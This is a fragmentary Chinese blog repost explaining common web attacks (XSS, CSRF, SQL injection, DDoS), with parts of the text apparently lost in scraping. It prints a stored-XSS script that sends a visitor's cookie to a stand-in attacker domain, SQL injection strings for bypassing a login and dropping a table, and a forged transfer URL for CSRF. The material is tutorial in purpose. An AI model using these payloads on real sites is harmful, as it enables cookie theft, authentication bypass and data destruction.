标签:account orm 基础上 信任 控制 占用 模拟 http请求 破坏
- XSS(跨站脚本攻击)
- CSRF(跨站请求伪造)
- SQL注入
- DDOS
<script>window.open(“www.gongji.com?param=”+document.cookie)</script>
,如果我没有对他的内容进行处理,直接存储到数据库,那么下一次当其他用户访问他的这篇文章的时候,服务器从数据库读取后然后响应给客户端,浏览器执行了这段脚本,然后就把该用户的cookie发送到攻击者的服务器了。<script>
,应该只是字符串却有了代码的作用。‘ or ‘1‘= ‘1
。这是最常见的sql注入攻击,当我们输如用户名 jiajun ,然后密码输如‘or ‘1‘= ‘1
的时候,我们在查询用户名和密码是否正确的时候,本来要执行的是select * from user where username=‘‘ and password=‘‘
,经过参数拼接后,会执行sql语句 select * from user where username=‘jaijun‘ and password=‘ ‘ or ‘ 1‘=‘1 ‘
,这个时候1=1是成立,自然就跳过验证了。‘;drop table user;--
,那么sql命令为select * from user where username=‘jiajun‘ and password=‘‘;drop table user;--‘
这个时候我们就直接把这个表给删除了www.A.com/transfer?account=666&money=10000
,那么这个时候很可能我就向账号为666的人转了1w软妹币转自: http://www.cnblogs.com/-new/p/7135814.html
标签:account orm 基础上 信任 控制 占用 模拟 http请求 破坏
原文地址:http://www.cnblogs.com/xifenglou/p/7267038.html